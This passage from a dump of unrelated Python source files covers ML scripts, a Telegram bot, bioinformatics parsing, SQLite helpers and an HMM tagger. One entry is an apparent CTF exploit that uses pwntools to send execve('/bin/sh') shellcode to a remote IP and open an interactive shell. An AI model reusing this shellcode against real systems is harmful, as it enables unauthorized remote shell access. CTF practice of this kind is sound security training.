        - arr: uint8 tensor, shape (N, img_height, img_width, 3), all three
          channels identical.
        - centre_x, centre_y: the centres expanded to (N, H, W) when
          return_params is True, otherwise (None, None).

    NOTE(review): z can reach 2.0 at the far corner, so (arr * 255).byte()
    can exceed 255 and wrap modulo 256 — TODO confirm centres/values are
    constrained so this overflow cannot happen.
    """
    # if batch_parameters is None:
    # centre_x, centre_y = get_initialization(img_height, img_width)
    batch_size = batch_parameters.shape[0]
    # Broadcast each centre over the whole image plane.
    centre_x = batch_parameters[:, 0].unsqueeze(-1).unsqueeze(-1).expand(batch_size, img_height, img_width)
    centre_y = batch_parameters[:, 1].unsqueeze(-1).unsqueeze(-1).expand(batch_size, img_height, img_width)
    # arr = torch.zeros([batch_size, img_height, img_width])
    expanded_coord_x = coord[:, 0, :, :].expand(batch_size, img_height, img_width)
    expanded_coord_y = coord[:, 1, :, :].expand(batch_size, img_height, img_width)
    # Compute heat map
    arr = (expanded_coord_x - centre_x) ** 2 + (expanded_coord_y - centre_y) ** 2
    # Cast to uint8
    arr = (arr * 255).byte()
    # Copy the array across all three channels
    arr = arr.unsqueeze(-1).expand(batch_size, img_height, img_width, 3)
    if return_params:
        return arr, centre_x, centre_y
    return arr, None, None
def get_initialization(batch_size, img_height=DEFAULT_HEIGHT, img_width=DEFAULT_WIDTH):
centre_x = torch.from_numpy(np.random.uniform(0, 1, size=(batch_size, 1))).float()
centre_y = torch.from_numpy(np.random.uniform(0, 1, size=(batch_size, 1))).float()
initial_params = torch.cat((centre_x, centre_y), 1)
return initial_params
|
23,565 | 16b176c1f8b3c6f73204707259a94b6e9a637474 | # Import libs
import pandas as pd
from matplotlib import pyplot as plt
from scipy.cluster import hierarchy
import numpy as np
# Read in the dataset
# Drop any fields that are strings
# Only get the first 40 because this dataset is big
df = pd.read_csv('Pokemon.csv')
df = df.set_index('Name')
del df.index.name
df = df.drop(["Type 1", "Type 2", "Legendary"], axis=1)
df = df.head(n=40)
# Calculate the distance between each sample
Z = hierarchy.linkage(df, 'ward')
# Orientation our tree
hierarchy.dendrogram(Z, orientation="left", labels=df.index)
plt.show() |
23,566 | 77c3fffbeba7584253a72cc25e2f1f8798dab2d3 | from __future__ import absolute_import, unicode_literals
import logging
from products.models import MainProductsCategorie, ProductsSubCategorie, Product
from django.urls import reverse
from celery import shared_task
import telebot
@shared_task
def telegramRegister(token):
    """Celery task that starts a (blocking) Telegram shop bot.

    Registers two command handlers and then enters bot.polling(), so this
    task runs until the worker is stopped — presumably intended to be
    launched once per bot token; TODO confirm duplicate launches are
    prevented elsewhere.
    """
    bot = telebot.TeleBot(token)

    @bot.message_handler(commands=['start'])
    def send_welcome(message):
        # Reply with every main category followed by its sub-categories.
        mpc = MainProductsCategorie.objects.all()
        psc = ProductsSubCategorie.objects.all()
        output = 'Доступные категории:\n'
        # NOTE(review): O(main * sub) nested scan; fine for small catalogues.
        for mc in mpc:
            output += mc.name + "\n\n"
            for sc in psc:
                if sc.parent == mc:
                    output += sc.name + "\n"
        bot.reply_to(message, output)

    @bot.message_handler(commands=['category'])
    def send_products_by_category(message):
        # Expected message form: "/category <sub-category name>".
        cat = message.text.split('/category ')
        try:
            psc = ProductsSubCategorie.objects.get(name = cat[1])
        except ProductsSubCategorie.DoesNotExist:
            bot.reply_to(message, "Такую категорию ещё не придумали:(")
            return
        products = Product.objects.filter(category = psc)
        output = 'Вот что я нашёл:\n\n'
        for product in products:
            output+= product.name + "\n" + product.description + "\n" + str(product.price) + "\n\n"
        bot.reply_to(message, output)

    # Blocks here, dispatching updates to the handlers above.
    bot.polling()
|
23,567 | 1acf6182a1a21fe9c2228f9b033d24435db54bd5 | #!/usr/bin/python
import sys
import os
# Require three positional arguments: the reference junction BED, the
# target GPD, and an output file prefix.
if len(sys.argv) < 4:
    print("usage: python ~/3seq/juncover.py ref_jun.bed target.gpd")
    print("or ~/3seq/juncover.py ref_jun.bed target.gpd")
    sys.exit(1)
ref_jun_filename, tag_gpd_filename, output_filename = sys.argv[1:4]
################################################################################
# Load the reference junctions into a dict keyed by
# "chrom:intron_start_intron_end" with occurrence counts as values.
ref_jun = open(ref_jun_filename, 'r')
ref_jun_dt = {}
for line in ref_jun:
    # Skip the UCSC track definition header line.
    if line[0:5] == 'track':
        continue
    line_list = line.strip().split("\t")
    chr_name = line_list[0]
    # blockSizes (column 11) gives the two flanking exon thicknesses; the
    # intron proper runs from chromStart+left_block to chromEnd-right_block.
    thickness = line_list[10].split(',')
    leftpos = str(int(line_list[1]) + int(thickness[0]))
    rightpos = str(int(line_list[2]) - int(thickness[1]))
    locus = chr_name + ":" + leftpos + "_" + rightpos
    # dict.has_key() is Python-2-only; `in` behaves identically on 2 and 3.
    if locus not in ref_jun_dt:
        ref_jun_dt[locus] = 0
    ref_jun_dt[locus] += 1
ref_jun.close()
################################################################################
# Scan every GPD transcript: write a BED record for each junction that is
# NOT covered by the reference set, and echo fully-covered transcripts to
# stdout.  (Python-2-only dict.has_key() and the print statement were
# replaced with forms valid on both Python 2 and 3; unused locals dropped.)
gpd = open(tag_gpd_filename, 'r')
output = open(output_filename + ".bed", 'w')
for refline in gpd:
    refline_list = refline.split()
    chr_name = refline_list[2]
    Exon_start_list = refline_list[9].strip(",").split(',')
    Exon_end_list = refline_list[10].strip(",").split(',')
    # A junction runs from the end of one exon to the start of the next.
    jun_start_ls = Exon_end_list[:-1]
    jun_end_ls = Exon_start_list[1:]
    covered = 0
    for j, start in enumerate(jun_start_ls):
        end = jun_end_ls[j]
        locus = chr_name + ":" + start + "_" + end
        if locus in ref_jun_dt:
            covered += 1
        else:
            # Emit a 2-block BED record with 50 bp anchors on each side of
            # the uncovered junction.
            jun_start = int(start)
            jun_end = int(end)
            output_ls = [chr_name, str(jun_start - 50), str(jun_end + 50),
                         "LR_covered_jun", "50", "+",
                         str(jun_start - 50), str(jun_end + 50),
                         "0,0,0", "2", "50,50"]
            jun_L = jun_end - jun_start - 50
            output_ls.append("0," + str(jun_L))
            output.write("\t".join(output_ls) + '\n')
    # All junctions covered (vacuously true for single-exon transcripts,
    # matching the original behaviour): echo the transcript line.
    if covered == len(jun_start_ls):
        print(refline.strip())
gpd.close()
################################################################################
output.close()
|
23,568 | b7f469283e98cdb1c5987f88a3b8559b451f1fdd | from pwn import *
import time
#r = process("./5cm")
# Connect to the remote CTF service (local binary run kept above for testing).
r = remote('125.235.240.168', 27019)
raw_input("?")  # pause so a debugger can be attached before sending anything
# Stage 1: "\x0F\x05" is the x86-64 `syscall` instruction — presumably the
# service executes this buffer directly; TODO confirm against the binary.
payload = "\x0F\x05"
r.send(payload)
time.sleep(2)  # give the service time to process stage 1 before stage 2
# Stage 2: NOP sled + what appears to be an execve("/bin/sh") shellcode
# (the XOR-encoded "/bin//sh" string pushed via rbx, syscall 0x3b) —
# NOTE(review): inferred from the byte pattern, not verified.
payload = "\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
r.sendline(payload)
r.interactive()  # hand the (hopefully spawned) shell to the operator
|
23,569 | 4cddf56128e31b2c01dbe84a8a2fd153552ecdbb | #!/usr/bin/env python3
# coding=utf-8
import sqlite3
import os
import platform
import tempfile
from .ConstantesBaseDatosSQLite import *
class GestorBD(object):
    """Thin helper around a single SQLite database file.

    Wraps one connection/cursor pair, offers optional debug tracing of the
    SQL it runs, and hosts the domain routines that build and populate the
    'especialidades' / 'itinerancias' tables.  The SQL templates
    (SQL_CREACION_*, PRELUDIO_SQL, FIN_SQL_ACCESS, NOMBRE_TABLA_ITINERANCIAS)
    come from ConstantesBaseDatosSQLite, star-imported at module level.
    """

    def __init__(self, archivo_db):
        """Open (or create) *archivo_db* and enable foreign-key enforcement."""
        self.debug = False
        self.archivo_db = archivo_db
        self.conexion = sqlite3.connect(self.archivo_db)
        self.cursor = self.conexion.cursor()
        self.ejecutar_sentencias(["PRAGMA foreign_keys=ON"])

    @staticmethod
    def get_preludio_sql(nombre_funcion):
        """Return the VBA/Access procedure header for *nombre_funcion*."""
        return PRELUDIO_SQL.format(nombre_funcion)

    @staticmethod
    def crear_sentencia_update(sentencia):
        """Wrap *sentencia* as a VBA `db.Execute` line (for the Access export)."""
        sql = "\tsql=\"" + sentencia + "\"\n"
        sql += "\tdb.Execute sql, dbFailOnError\n"
        return sql

    def crear_tabla_itinerancias(self, nombre_tabla=NOMBRE_TABLA_ITINERANCIAS):
        """Create the itinerancias table from its SQL template."""
        self.ejecutar_sentencias(
            [
                SQL_CREACION_PLANTILLAS.format(nombre_tabla)
            ]
        )

    @staticmethod
    def get_procedimiento(nombre, sql_intermedio):
        """Assemble a full VBA procedure: header + body + footer."""
        inicio = GestorBD.get_preludio_sql(nombre)
        fin = GestorBD.get_fin_sql()
        return inicio + sql_intermedio + fin

    @staticmethod
    def get_fin_sql():
        """Return the VBA/Access procedure footer."""
        return FIN_SQL_ACCESS

    def activar_depuracion(self):
        """Print every statement before it is executed."""
        self.debug = True

    def desactivar_depuracion(self):
        """Stop printing statements."""
        self.debug = False

    def get_unico_valor(self, sql_con_valor_unico, nombre_columna=None):
        """Run a SELECT expected to yield a single value and return it.

        *nombre_columna* is accepted (and ignored) for backward
        compatibility: cambiar_nombres_por_codigos() passes a column name
        as a second positional argument, which previously crashed with a
        TypeError because the parameter did not exist.
        """
        if self.debug:
            print(sql_con_valor_unico)
        filas = self.get_filas(sql_con_valor_unico)
        return filas[0][0]

    def ejecutar_sentencias(self, lista_sentencias):
        """Execute each statement, report failures, then commit.

        Execution is deliberately best-effort (a failing statement is
        reported and the remaining ones still run, as in the original),
        but only Exception is caught now instead of a bare `except:` that
        also swallowed KeyboardInterrupt/SystemExit.
        """
        for sql in lista_sentencias:
            if self.debug:
                print("-" * 20)
                print(sql)
                print("-" * 20)
            try:
                self.cursor.execute(sql)
            except Exception:
                print("Fallo la sentencia siguiente:")
                print(sql)
        self.conexion.commit()

    def get_filas(self, select):
        """Run *select* and return all rows as a list of tuples."""
        filas = self.cursor.execute(select)
        return filas.fetchall()

    def cuantos_cumplen_select(self, select):
        """Return how many rows *select* yields."""
        filas = self.get_filas(select)
        return len(filas)

    def __del__(self):
        # Best effort: the cursor/connection may already be torn down at
        # interpreter shutdown, so never let __del__ raise.
        try:
            self.cursor.close()
        except Exception:
            pass

    def get_descripcion(self):
        """Return the raw cursor description of the last executed SELECT."""
        return self.cursor.description

    def get_nombres_columnas(self):
        """Return the column names of the last executed SELECT."""
        descripciones = self.cursor.description
        nombres_columnas = []
        for d in descripciones:
            nombres_columnas.append(d[0])
        return nombres_columnas

    def extraer_tuplas_especialidades_de_fichero(self, nombre_fichero):
        """Parse an Especialidades file into (codigo, descripcion) tuples.

        Each line carries a 3-character code, one separator character and
        the description.  A context manager now guarantees the file is
        closed even if a line is malformed (the original leaked the handle
        on error).
        """
        tuplas = []
        with open(nombre_fichero, encoding="utf-8") as fichero:
            for l in fichero.readlines():
                codigo = l[0:3]
                descripcion = l[4:].strip()
                tuplas.append((codigo, descripcion))
        return tuplas

    def crear_tabla_todas_especialidades(self, nombre_tabla_especialidades):
        """Create the especialidades table and load every teaching-corps file."""
        sql = SQL_CREACION_ESPECIALIDADES.format(nombre_tabla_especialidades)
        self.ejecutar_sentencias([sql])
        ficheros = ["590", "591", "592", "594", "595", "596", "597"]
        for f in ficheros:
            self.crear_tabla_especialidades(f, nombre_tabla_especialidades)

    def crear_tabla_especialidades(self, codigo_cuerpo, nombre_tabla_especialidades):
        """Insert every specialty of one corps in all language/part-time variants.

        The leading code letter encodes the variant: 0 = Spanish full-time,
        P = Spanish part-time, B = English full-time, W = English part-time,
        R = French part-time, F = French full-time.  The six near-identical
        copy-pasted insert blocks of the original were consolidated into a
        single loop producing byte-identical statements in the same order.
        """
        f = codigo_cuerpo
        sql = []
        dir_actual = os.path.dirname(os.path.realpath(__file__))
        ruta_fichero = dir_actual + os.path.sep + "Especialidades0{0}.txt".format(f)
        especialidades = self.extraer_tuplas_especialidades_de_fichero(ruta_fichero)
        # Columns: codigo, nombre, idioma, tiempo parcial (SI/NO).
        variantes = [
            ("0", "ESPAÑOL", "NO"),
            ("P", "ESPAÑOL", "SI"),
            ("B", "INGLÉS", "NO"),
            ("W", "INGLÉS", "SI"),
            ("R", "FRANCÉS", "SI"),
            ("F", "FRANCÉS", "NO"),
        ]
        for tupla in especialidades:
            codigo = tupla[0]
            nombre = tupla[1]
            for letra, idioma, parcial in variantes:
                insert = ("insert or ignore into especialidades values "
                          "('{3}{2}{0}', '{1}', '{4}', '{5}')").format(
                    codigo, nombre, f, letra, idioma, parcial)
                sql.append(insert)
        self.ejecutar_sentencias(sql)

    def get_sql_especialidades(self):
        """Return the baseline PRIMARIA/SECUNDARIA insert statements.

        NOTE: as in the original, this also *executes* every corps-file
        load as a side effect (crear_tabla_especialidades runs its inserts
        directly); only the two generic rows are returned.
        """
        sql = []
        insert_primaria = "insert or ignore into especialidades values ('PRIMARIA', 'DESCONOCIDA', 'ESPAÑOL', 'NO')"
        sql.append(insert_primaria)
        insert_secundaria = "insert or ignore into especialidades values ('SECUNDARIA', 'DESCONOCIDA', 'ESPAÑOL', 'NO')"
        sql.append(insert_secundaria)
        ficheros = ["590", "591", "592", "594", "595", "596", "597"]
        for f in ficheros:
            self.crear_tabla_especialidades(f, "especialidades")
        return sql

    def crear_tablas_iniciales_en_bd(self):
        """Create and populate the initial schema of a fresh database."""
        # The original executed the foreign-keys PRAGMA twice in a row;
        # once is enough.
        self.ejecutar_sentencias(["PRAGMA foreign_keys=ON"])
        self.crear_tabla_todas_especialidades("especialidades")
        self.ejecutar_sentencias([SQL_CREACION_NOMBRAMIENTOS])
        # BUG FIX: the original called BD_RESULTADOS.get_sql_especialidades(),
        # but no BD_RESULTADOS name exists anywhere in this module, so the
        # call raised NameError at runtime.  The method lives on this class.
        self.ejecutar_sentencias(self.get_sql_especialidades())

    def cambiar_nombres_por_codigos(self, nombre_tabla_rutas, nombre_tabla_localidades):
        """Replace locality names with locality codes in the routes table.

        For every locality, rewrites both the `origen` and `destino`
        columns; a couple of known misspelled localities are then handled
        explicitly.  (Works now that get_unico_valor accepts the second
        argument this method has always passed.)
        """
        sql_localidades = "select nombre_localidad from {0}".format(nombre_tabla_localidades)
        if self.debug:
            print(sql_localidades)
        filas_localidades = self.get_filas(sql_localidades)
        sql_extractor_codigo = "select codigo_localidad from {0} where nombre_localidad='{1}'"
        sentencias_update = []
        for localidad in filas_localidades:
            codigo_localidad = self.get_unico_valor(sql_extractor_codigo.format(
                nombre_tabla_localidades, localidad[0]
            ), 'codigo_localidad')
            sql_update = "update {0} set origen='{1}' where origen='{2}'".format(
                nombre_tabla_rutas, codigo_localidad, localidad[0]
            )
            sentencias_update.append(sql_update)
            sql_update = "update {0} set destino='{1}' where destino='{2}'".format(
                nombre_tabla_rutas, codigo_localidad, localidad[0]
            )
            sentencias_update.append(sql_update)
        # Known misspellings that must map to the same locality code.
        excepciones = [
            ("130360002", "Cortijos de Arriba"),
            ("130360002", "Cortijo de Arriba"),
        ]
        for codigo_localidad, localidad in excepciones:
            sentencias_update.append("update {0} set origen='{1}' where origen='{2}'".format(
                nombre_tabla_rutas, codigo_localidad, localidad
            ))
            sentencias_update.append("update {0} set destino='{1}' where destino='{2}'".format(
                nombre_tabla_rutas, codigo_localidad, localidad
            ))
        self.ejecutar_sentencias(sentencias_update)
|
23,570 | 333c78752cb6391457553a1bfc0060ac57d7cec9 | # -*- coding: utf-8 -*-
#################################################
# SVM: support vector machine
# Author : zouxy
# Date : 2013-12-12
# HomePage : http://blog.csdn.net/zouxy09
# Email : zouxy09@qq.com
#################################################
from numpy import *
import AI.svm as SVM; reload(SVM);
################## test svm #####################
## step 1: load data
# NOTE(review): TrainData and TrainTag are not defined anywhere in this
# file — the script appears to expect them in an interactive namespace
# (it also relies on `mat` from the `from numpy import *` above).  The
# first two assignments are redundant: they are overwritten by the mat()
# versions two lines later.
print "step 1: load data..."
dataSet = TrainData
labels = TrainTag
training_count=200
dataSet = mat(TrainData)
labels = mat(TrainTag).T
# First 200 samples train the SVM; ALL samples (train + rest) are tested.
train_x = dataSet[:training_count, :]
train_y = labels[:training_count, :]
test_x = dataSet[:, :]
test_y = labels[:, :]
## step 2: training...
print "step 2: training..."
# Alternative RBF-kernel configuration, kept for reference:
'''
C = 100
toler = 0.1
maxIter = 1000
svmClassifier = SVM.trainSVM(train_x, train_y, C, toler, maxIter, kernelOption = ('rbf', 99999)) #'rbf or linear'
'''
# Active configuration: soft-margin linear kernel.
C = 0.6
toler = 0.001
maxIter = 500
svmClassifier = SVM.trainSVM(train_x, train_y, C, toler, maxIter, kernelOption = ('linear', 0))
#'''
## step 3: testing
print "step 3: testing..."
accuracy,pred = SVM.testSVM(svmClassifier, test_x, test_y)
## step 4: show the result
print "step 4: show the result..."
print 'The classify accuracy is: %.3f%%' % (accuracy * 100)
SVM.showSVM(svmClassifier)
|
23,571 | 270804ac50cb74441162253f03a9958641696d6b | """empty message
Revision ID: 4bbfdf089fbc
Revises: 2cc431e5815b
Create Date: 2014-01-07 23:46:14.694649
"""
# revision identifiers, used by Alembic.
revision = '4bbfdf089fbc'
down_revision = '2cc431e5815b'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
    # Add the (non-nullable) management flag and tighten the membership
    # foreign keys so every row must reference both a project and a user.
    op.add_column('membership', sa.Column('allows_management', sa.Boolean(), nullable=False))
    op.alter_column('membership', 'project_id',
               existing_type=mysql.INTEGER(display_width=11),
               nullable=False)
    op.alter_column('membership', 'user_id',
               existing_type=mysql.INTEGER(display_width=11),
               nullable=False)
def downgrade():
    # Exact reverse of upgrade(): relax the foreign keys back to nullable
    # and drop the management flag.
    op.alter_column('membership', 'user_id',
               existing_type=mysql.INTEGER(display_width=11),
               nullable=True)
    op.alter_column('membership', 'project_id',
               existing_type=mysql.INTEGER(display_width=11),
               nullable=True)
    op.drop_column('membership', 'allows_management')
|
23,572 | 78877dca167b9c0b337216f8a67b5383dcb637d1 | import utils
import logging
import collections
from itertools import islice
from optparse import OptionParser
def create_model_viterbi_only(sentences):
    """Count word/tag co-occurrences for the unigram baseline tagger.

    Returns a nested defaultdict: counts[word][tag] -> frequency.
    """
    counts = collections.defaultdict(lambda: collections.defaultdict(int))
    for sentence in sentences:
        for tok in sentence:
            counts[tok.word][tok.tag] += 1
    return counts
def predict_tags_viterbi_only(sentences, model):
    """Tag every token with its most frequent training tag (unigram baseline).

    Mutates the tokens in place and returns the sentences.

    Bugs fixed: the original shadowed the builtin `max` and left `winner`
    unbound — an unseen first word raised UnboundLocalError.  An unseen
    word now inherits the previous token's winning tag (matching the
    original's accidental carry-over for later tokens) and falls back to
    None at the very start.
    """
    winner = None
    for sentence in sentences:
        for token in sentence:
            best_count = 0
            for tag, count in model[token.word].items():
                if count > best_count:
                    best_count = count
                    winner = tag
            token.tag = winner
    return sentences
# Splitting data into tags and tokens
class Token:
    """A single word/POS-tag pair from the tagged corpus."""

    def __init__(self, word, tag):
        self.word = word
        self.tag = tag

    def __str__(self):
        # Render in the conventional "word/TAG" corpus notation.
        return "{0}/{1}".format(self.word, self.tag)
# Creating Python Dictionaries for Sentences and Words
def create_model(sentences):
    """Estimate HMM parameters from tagged sentences.

    Returns (transition, emission) where
      transition[prev_tag][tag] = add-one-smoothed P(tag | prev_tag)
                                  = (count + 1) / (count(prev_tag) + 45),
                                  45 being the tagset size, and
      emission[tag][word]       = unsmoothed P(word | tag).
    A virtual '<s>' tag (emitting the empty word) marks sentence starts,
    exactly as the original achieved by temporarily inserting Token('', '<s>').

    Bug fixed: the original paired numerators and denominators by *position*
    (`tag_a.items()[i]` alongside the i-th item of tag_b/tag_words), so a
    tag's counts were divided by a different tag's total whenever the dicts
    enumerated in different orders — and dict views aren't even indexable on
    Python 3.  Denominators are now looked up by tag name.
    """
    tag_a = collections.defaultdict(int)  # unigram tag counts
    tag_b = collections.defaultdict(
        lambda: collections.defaultdict(int))  # tag bigram counts
    tag_words = collections.defaultdict(lambda: collections.defaultdict(int))  # tag -> word counts

    for sentence in sentences:
        # Count the virtual sentence-start token (tag '<s>', empty word)
        # without mutating the sentence.
        tag_a['<s>'] += 1
        tag_words['<s>'][''] += 1
        prev_tag = '<s>'
        for token in sentence:
            tag_a[token.tag] += 1
            tag_words[token.tag][token.word] += 1
            tag_b[prev_tag][token.tag] += 1
            prev_tag = token.tag

    transition = collections.defaultdict(lambda: collections.defaultdict(int))
    emission = collections.defaultdict(lambda: collections.defaultdict(int))

    # Add-one-smoothed transition probabilities (45 distinct tags).
    for prev_tag, next_counts in tag_b.items():
        denom = float(tag_a[prev_tag])
        for next_tag, count in next_counts.items():
            transition[prev_tag][next_tag] = (float(count) + 1) / (denom + 45)

    # Maximum-likelihood emission probabilities.
    for tag, word_counts in tag_words.items():
        denom = float(tag_a[tag])
        for word, count in word_counts.items():
            emission[tag][word] = float(count) / denom

    return transition, emission
def predict_tags(sentences, model):
    """Viterbi-decode the best tag sequence for each sentence, in place.

    model is the (transition, emission) pair from create_model():
    model[0][prev_tag][tag] and model[1][tag][word].  Unseen words get a
    tiny emission probability (1e-7) instead of zero so decoding can
    proceed.  Returns the (mutated) sentences.
    """
    tagset = ['NN', 'CC', 'CD', 'DT', 'EX', 'FW', 'IN', 'JJ', 'JJR', 'JJS', 'LS', 'MD', 'NNS', 'NNP', 'NNPS', 'PDT', 'POS', 'PRP', 'PRP$', 'RB', 'RBR',
              'RBS', 'RP', 'SYM', 'TO', 'UH', 'VB', 'VBD', 'VBN', 'VBP', 'VBG', 'VBZ', 'WDT', 'WP', 'WP$', 'WRB', '.', ',', '``', "''", ')', '(', '$', ':', '#']
    final = 0
    for sentence in sentences:
        # Grabbing a list of words in sentence.
        words = [token.word for token in sentence]
        viterbi = {}  # Creating the blank dictionary for this sentence.
        for t in tagset:
            # Creating the matrix with a width of len(sentence).
            # Cells start as 0 and become (probability, best_prev_tag) tuples.
            viterbi[t] = [0] * len(sentence)
        for i, word in enumerate(words, 0):  # Looping through the sentence
            v = 0
            for t in tagset:
                # Grabbing the correct emission probability for word given t
                em_prob = model[1][t][word]
                if em_prob == 0:  # Taking care of unseen words in testing, part 1
                    em_prob = float(0.0000001)
                marker_t = ''
                baseline = 0
                for tag in tagset:
                    # Grabbing the correct transition probability for current tag "t" given each previous tag "tag"
                    tr_prob = model[0][tag][t]
                    # If it's the first word in the sentence, we calculate differently.
                    if i == 0:
                        tr_prob = model[0]['<s>'][t]
                    consider = em_prob * tr_prob
                    if i >= 1:  # For all subsequent words
                        # Previous column cells are (prob, tag) tuples by now.
                        prev = viterbi[tag][i-1][0]
                        consider = em_prob * tr_prob * prev
                    if (consider > baseline):
                        baseline = consider
                        # NOTE(review): this stores the CURRENT tag t, not the
                        # maximising previous tag `tag` — so the stored
                        # "backpointer" is not a true backpointer; TODO confirm
                        # this is the intended (original) behaviour.
                        marker_t = t
                if baseline > v:
                    v = baseline
                    final = marker_t
                # Update your Viterbi cell here after getting the max!!
                viterbi[t][i] = (baseline, marker_t)
                if i == len(sentence)-1:
                    # Save the final tag so we can add it to our taglist.
                    sentence[i].tag = final
        ###########################################
        tags = []  # Starting our backpointer method
        # NOTE(review): m and tag are reset per sentence but NOT per time
        # step below, so earlier (larger) probabilities can mask later
        # columns; preserved as-is because the scoring quirks above depend
        # on it.
        m = 0
        tag = ''
        for i in range((len(sentence)-1), -1, -1):  # Iterating backward through the list
            # Appending the last tag in the sentence to our list
            if i == (len(sentence)-1):
                tags.append(sentence[i].tag)
            else:  # For all subsequent words, working backwards
                for t in tagset:
                    temp = viterbi[t][i][0]
                    if temp != 0:
                        if viterbi[t][i][0] > m:
                            m = viterbi[t][i][0]
                            tag = viterbi[t][i][1]
                # If we originally had "blank" values - for unknown words.
                if m == 0:
                    for t in tagset:
                        if viterbi[t][i][1] != '':
                            tag = viterbi[t][i][1]
                # Add the final tag value to our reversed list
                tags.append(tag)
        tags.reverse()  # Reversing the list from R-L to L-R
        for i in range(len(sentence)):
            # Zipping the taglist back up to the sentence
            sentence[i].tag = tags[i]
    return sentences
if __name__ == "__main__":
    # CLI: evaluate the unigram-baseline tagger and the full HMM+Viterbi
    # tagger on a gold (training) file and a test file, printing accuracy
    # for each combination.  (Python 2 script: print statements.)
    usage = "usage: %prog [options] GOLD TEST"
    parser = OptionParser(usage=usage)
    parser.add_option("-d", "--debug", action="store_true",
                      help="turn on debug mode")
    (options, args) = parser.parse_args()
    if len(args) != 2:
        parser.error("Please provide required arguments")
    if options.debug:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.CRITICAL)
    training_file = args[0]
    training_sentences = utils.read_tokens(training_file)
    test_file = args[1]
    test_sentences = utils.read_tokens(test_file)
    model = create_model(training_sentences)
    model_viterbi_only = create_model_viterbi_only(training_sentences)
    # read sentences again because predict_tags_viterbi_only(...) rewrites the tags
    sents = utils.read_tokens(training_file)
    predictions = predict_tags_viterbi_only(sents, model_viterbi_only)
    accuracy = utils.calc_accuracy(training_sentences, predictions)
    print "Accuracy in training [%s sentences] with Viterbi only : %s " % (
        len(sents), accuracy)
    # read sentences again because predict_tags_viterbi_only(...) rewrites the tags
    sents = utils.read_tokens(test_file)
    predictions = predict_tags_viterbi_only(sents, model_viterbi_only)
    accuracy = utils.calc_accuracy(test_sentences, predictions)
    print "Accuracy in testing [%s sentences] with Viterbi only : %s " % (
        len(sents), accuracy)
    # read sentences again because predict_tags(...) rewrites the tags
    sents = utils.read_tokens(training_file)
    predictions = predict_tags(sents, model)
    accuracy = utils.calc_accuracy(training_sentences, predictions)
    print "Accuracy in training [%s sentences] with HMM and Viterbi : %s " % (
        len(sents), accuracy)
    # read sentences again because predict_tags(...) rewrites the tags
    sents = utils.read_tokens(test_file)
    predictions = predict_tags(sents, model)
    accuracy = utils.calc_accuracy(test_sentences, predictions)
    print "Accuracy in testing [%s sentences] with HMM and Viterbi : %s " % (
        len(sents), accuracy)
|
23,573 | d9b52f25459a314ad1d34fc4cab6740683cbd607 | '''
用类和面向对象的思想,“描述”生活中任意接触到的东西(比如动物、小说里面的人物,不做限制,随意发挥),数量为5个。
-- by celia 2020.08.09
'''
class Country:
    """Model a country's basic facts: official name, continent, language, capital.

    Each setter prints one human-readable sentence as a side effect.
    """

    # Restrict instances to exactly these five attributes
    # (note: 'consistent' is the original author's spelling of 'continent').
    __slots__ = ("country", "name", "consistent", "language", "city")

    def __init__(self, country):
        self.country = country
        print("Human beings live on the earth, here describes country : {0}".format(country))

    def test(self):
        # Placeholder kept for interface compatibility.
        pass

    def Fname(self, name):
        """Record and announce the country's official (full) name."""
        self.name = name
        if name == 'China':
            print("{0}'s authority name is :the People's Republic of China".format(self.country))
        else:
            print("{0}'s authority name is :{1}".format(self.country, name))

    def where(self, consistent):
        """Record and announce the continent."""
        self.consistent = consistent
        print("{0} belongs to {1}".format(self.country, consistent))

    def speak(self, language):
        """Record and announce the spoken language."""
        self.language = language
        print("People in {0} speak {1}".format(self.country, language))

    def capital(self, city):
        """Record and announce the capital city."""
        self.city = city
        print("{0}'s capital is {1}".format(self.country, city))
# Demo: describe five countries with the Country class defined above.
China = Country('China')
China.Fname("China")
# Bug fix: corrected the misspelling 'Aisa' -> 'Asia' in the printed output.
China.where('Asia')
China.speak('Chinese')
China.capital("Beijing\n")

US = Country("US")
US.Fname("United States of America")
US.where('North America')
US.speak('English')
US.capital("Washington\n")

UK = Country("UK")
UK.Fname("The United Kingdom of Great Britain and Northern Ireland")
UK.where('Europe')
UK.speak("English")
UK.capital("London\n")

Russia = Country("Russia")
Russia.Fname("Russian Federation")
Russia.where("Europe")
Russia.speak("Russian")
Russia.capital("Moscow\n")

Germany = Country("Germany")
Germany.Fname("The Federal Republic of Germany or Moral Country")
Germany.where("Europe")
Germany.speak("German")
Germany.capital("Berlin\n")
|
23,574 | a13b4dd0caa2f1e2ee1c1f09fa95e957f12a3cf1 | import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint
from tensorflow.keras.utils import to_categorical
import numpy as np
from lib import data, models
# Create a CNN model trained on mnist - used for the evaluation of generative models on stacked mnist e.g. by mode counting
(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()
train_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')
train_images = (train_images - 127.5) / 127.5  # Normalize the images to [-1, 1]
# NOTE(review): test_images is not cast to float32 like train_images; the
# division promotes it to float64 -- confirm the model accepts that.
test_images = (test_images - 127.5) / 127.5  # Normalize the images to [-1, 1]
# One-hot encode the 10 digit classes.
train_labels = to_categorical(train_labels)
test_labels = to_categorical(test_labels)
# Ensure NHWC shape (N, 28, 28, 1); the train reshape is a no-op at this point.
train_images = np.reshape(train_images, (-1, 28, 28, 1))
test_images = np.reshape(test_images, (-1, 28, 28, 1))

# Build and compile the classifier.
cnn = models.mnist_cnn()
optimizer = tf.keras.optimizers.Adam(learning_rate=1e-4)
cnn.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])

# Train with early stopping; checkpoint the weights with the best val_loss.
checkpoint_path = 'data/cnn_model_checkpoint.hdf5'
earlyStopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')
mcp_save = ModelCheckpoint(checkpoint_path, save_best_only=True, monitor='val_loss', mode='min')
cnn.fit(train_images, train_labels, validation_data=(test_images, test_labels), callbacks=[earlyStopping, mcp_save],
        batch_size=32, epochs=100, verbose=2)

# Restore the best checkpoint before the final evaluation.
cnn.load_weights(checkpoint_path)
eval_out = cnn.evaluate(test_images, test_labels)
print(eval_out)
|
